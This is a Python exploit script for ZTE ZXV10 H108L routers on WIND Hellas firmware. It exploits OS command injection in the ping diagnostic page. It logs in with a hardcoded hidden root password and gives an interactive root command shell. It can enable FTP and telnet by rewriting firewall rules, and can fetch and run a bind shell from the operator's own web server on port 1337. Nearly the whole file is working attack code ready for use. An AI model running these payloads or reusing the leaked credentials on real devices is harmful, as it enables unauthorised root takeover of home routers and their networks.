/
ztexploit.py
237 lines (198 loc) · 9.41 KB
/
ztexploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
#!/usr/bin/python
# ---------------------------------------------------------------------------------------------------------------
# ZTE ZXV10 H108L Router with <= V1.0.01_WIND_A01 - RCE Root Exploit
# Copyright (c) 2013 Anastasios Stasinopoulos <stasinopoulos@unipi.gr>
# ---------------------------------------------------------------------------------------------------------------
# ZTE ZXV10 H108L router with WIND Hellas's custom software is vulnerable to OS Command injection attack.
# By using this vulnerability an attacker is able to execute system command with root privileges.
# ---------------------------------------------------------------------------------------------------------------
# Tested on ZTE:
# [*] Model name : ZTE ZXV10 H108L
# [*] Software Version : V1.0.01_WIND_A01 <~ WIND Hellas's *latest* software update! :)
# [*] Hardware Version : V1.1.00
# [*] Boot Loader Version : V1.0.04
# ---------------------------------------------------------------------------------------------------------------
# ztexploit.py tested on Backtrack 5 r3
# ---------------------------------------------------------------------------------------------------------------
# 05 Sep 2013: Vulnerability reported to Information Security Officer of WIND HELLAS
# 05 Sep 2013: Confirmation from Customer Service Department of WIND HELLAS, that our request is being processed.
# ---------------------------------------------------------------------------------------------------------------
import urllib, re, time, os, sys, urllib2, commands
# -------------------------------------------------
# Generic (hidden) 'root' account credentials.
# Hint: Use these credentials to login on Telnet
# -------------------------------------------------
username = "root"
password = "W!n0&oO7."
# --------------------------------------------------
# Default 'admin' account credentials
# -------------------------------------------------
#username = "admin"
#password = "admin"
os.system('clear')
##
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0;0m'
##
print "+-----------------------------------------------------------------+"
print "| ZTE ZXV10 H108L with <= V1.0.01_WIND_A01 - RCE Root Exploit |"
print "| Anastasios Stasinopoulos (c) 2013 - <stasinopoulos@unipi.gr> |"
print "+-----------------------------------------------------------------+"
try:
target = raw_input("\nEnter the address of the ZTE router\n> ")
if target[:7] != "http://":
target = "http://"+target
try:
response = urllib.urlopen(target)
html_data = response.read()
sys.stdout.write(" [*] Retrieving random login token...\r")
sys.stdout.flush()
time.sleep(3)
# Checking for random Login token
Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";', html_data)
if Frm_Logintoken :
sys.stdout.write(" ["+GREEN+" OK "+RESET+"]\n")
time.sleep(1)
Frm_Logintoken = str(Frm_Logintoken[0])
# Login with root credentials
do_login =[('Frm_Logintoken',Frm_Logintoken),('Username',username),('Password',password)]
do_login = urllib.urlencode(do_login)
page = target+"/login.gch"
request = urllib2.Request(page, do_login)
response = urllib2.urlopen(request)
html_data = response.read()
# Check router information on "template.gch" page
info = target+"/template.gch"
response = urllib.urlopen(info)
html_data = response.read()
print " [*] Login token: "+GREEN+Frm_Logintoken+RESET
# Check for Model Name
Frm_ModelName = re.findall(r'Frm_ModelName" class="tdright">(.*)<', html_data)
if Frm_ModelName :
Frm_ModelName = str(Frm_ModelName[0])
print " [*] Model Name: "+GREEN+Frm_ModelName+RESET
# Check for Serial Number
Frm_SerialNumber = re.findall(r'Frm_SerialNumber" class="tdright">(.*)', html_data)
if Frm_SerialNumber :
Frm_SerialNumber = str(Frm_SerialNumber[0])
print " [*] Serial Number: "+GREEN+Frm_SerialNumber+RESET
# Check for Hardware Version
Frm_SoftwareVerExtent = re.findall(r'Frm_SoftwareVerExtent" class="tdright">(.*)<', html_data)
if Frm_SoftwareVerExtent :
Frm_SoftwareVerExtent = str(Frm_SoftwareVerExtent[0])
print " [*] Hardware Version: "+GREEN+Frm_SoftwareVerExtent+RESET
# Check for Software Version
Frm_HardwareVer = re.findall(r'Frm_HardwareVer" class="tdright">(.*)<', html_data)
if Frm_HardwareVer :
Frm_HardwareVer = str(Frm_HardwareVer[0])
print " [*] Software Version: "+GREEN+Frm_HardwareVer+RESET
# Check for Boot Loader Version
Frm_BootVer = re.findall(r'Frm_BootVer" class="tdright">(.*)<', html_data)
if Frm_BootVer :
Frm_BootVer= str(Frm_BootVer[0])
print " [*] Boot Loader Version: "+GREEN+Frm_BootVer+RESET
# Main menu
print"\nWelcome to 'ZTEXPLOIT' main menu:"
print" 1. Pseudo-Terminal access."
print" 2. Enable FTP access."
print" 3. Enable TELNET access."
print" 4. Bind shell on port 1337."
print" 5. Quit."
while True:
choice = raw_input("\nEnter your choice: ")
if choice == "1":
print "\nPseudo-Terminal (type 'q' for quit)"
print "Enter your command:"
while True:
cmd = raw_input("# ")
if cmd == "q":
sys.exit(1)
else:
payload = "/getpage.gch%3Fpid%3D1002%26nextpage%3Dmanager_dev_ping_t.gch%26Host%3D%3Becho+%24("+cmd+")%26NumofRepeat%3D1%26DataBlockSize%3D64%26DiagnosticsState%3DRequested%26IF_ACTION%3Dnew%26IF_IDLE%3Dsubmit"
exploit = target + payload
response = urllib.urlopen(exploit)
time.sleep(3)
html_data = response.read()
page = target+"/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch"
response = urllib.urlopen(page)
html_data = response.read()
# Check for response on given command
shell = re.findall(r'textarea_1">(.*) -c', html_data)
if shell:
print shell
else:
shell1 = re.findall(r'textarea_1">(.*)', html_data)
if shell1[0] == "-c 1 -s 64":
print "No response on '"+cmd+"' command!"
else:
shell2 = re.findall(r'(.*) -c', html_data)
shell = shell1+shell2
if shell[0] != "</textarea>":
print shell
else:
print "No response on '"+cmd+"' command!"
elif choice == "2":
print "\nPlease wait..."
print "Enabling FTP deamon on "+target+"...\n"
# Enable vsftpd on target
cmd = "vsftpd start"
payload = "/getpage.gch%3Fpid%3D1002%26nextpage%3Dmanager_dev_ping_t.gch%26Host%3D%3B"+cmd+"%26NumofRepeat%3D1%26DataBlockSize%3D64%26DiagnosticsState%3DRequested%26IF_ACTION%3Dnew%26IF_IDLE%3Dsubmit"
enable_ftp = target + payload
response = urllib.urlopen(enable_ftp)
time.sleep(10)
html_data = response.read()
time.sleep(5)
target = target.replace('http://','')
os.system("ftp "+str(target))
sys.exit(1)
elif choice == "3":
print "\nPlease wait..."
print "Enabling TELNET deamon on "+target+"...\n"
# Enable telnet on target
payload = "/getpage.gch%3Fpid%3D1002%26nextpage%3Dsec_sc_t.gch%26IF_ACTION%3Dapply%26IF_ERRORSTR%3DSUCC%26IF_ERRORPARAM%3DSUCC%26IF_ERRORTYPE%3D-1%26ViewName%3DNULL%26Enable%3D1%26INCViewName%3DIGD.LD1%26INCName%3DLAN%26MinSrcIp%3D0.0.0.0%26MinSrcMask%3DNULL%26MaxSrcIp%3D0.0.0.0%26FilterTarget%3D1%26Servise%3D8%26ViewName0%3DIGD.FWSc.FWSC1%26Enable0%3D1%26INCViewName0%3DIGD.WANIF%26INCName0%3DWAN%26MinSrcIp0%3D%26MinSrcMask0%3D0.0.0.0%26MaxSrcIp0%3D%26FilterTarget0%3D1%26Servise0%3D1%26ViewName1%3DIGD.FWSc.FWSC2%26Enable1%3D1%26INCViewName1%3DIGD.LD1%26INCName1%3DLAN%26MinSrcIp1%3D%26MinSrcMask1%3D0.0.0.0%26MaxSrcIp1%3D%26FilterTarget1%3D0%26Servise1%3D8%26ViewName2%3DIGD.FWSc.FWSC3%26Enable2%3D1%26INCViewName2%3DIGD.WANIF%26INCName2%3DWAN%26MinSrcIp2%3D%26MinSrcMask2%3D0.0.0.0%26MaxSrcIp2%3D%26FilterTarget2%3D1%26Servise2%3D8%26IF_INDEX%3D1%26IF_INSTNUM%3D3"
enable_telnet = target + payload
resonse = urllib.urlopen(enable_telnet)
time.sleep(10)
html_data = response.read()
time.sleep(5)
target = target.replace('http://','')
os.system("telnet "+str(target))
sys.exit(1)
elif choice == "4":
host = raw_input("\nEnter your local address\n> ")
if host[:7] != "http://":
host = "http://"+host
os.system("cp shell /var/www/")
print "\nChecking apache2 service state..."
os.system("service apache2 restart >/dev/null 2>&1")
print "Please wait for bind shell on port 1337...\n"
# Uploading special bind shell on target
cmd = "cd /tmp; wget "+host+"/shell; chmod 777 shell; ./shell; echo $(ls)"
payload = "/getpage.gch%3Fpid%3D1002%26nextpage%3Dmanager_dev_ping_t.gch%26Host%3D%3B"+cmd+"%26NumofRepeat%3D1%26DataBlockSize%3D64%26DiagnosticsState%3DRequested%26IF_ACTION%3Dnew%26IF_IDLE%3Dsubmit"
bind_shell = target + payload
response = urllib.urlopen(bind_shell)
time.sleep(10)
html_data = response.read()
time.sleep(5)
target = target.replace('http://','')
res1 = commands.getoutput("nc -z -v "+str(target)+ " 1337")
res = re.findall(r'open', res1)
if res:
print "Woohoo! Got bind shell on port 1337..."
os.system("nc "+str(target)+" 1337")
else:
print "Bind shell connection failed!"
sys.exit(1)
elif choice == "5":
print("Goodbye.")
sys.exit(1)
else:
print("Wrong Option!")
else:
sys.stdout.write(" ["+RED+" FALSE "+RESET+"]\n")
except IOError, e:
print "Failed to connect on "+target
except (KeyboardInterrupt, SystemExit):
print ""
# EOF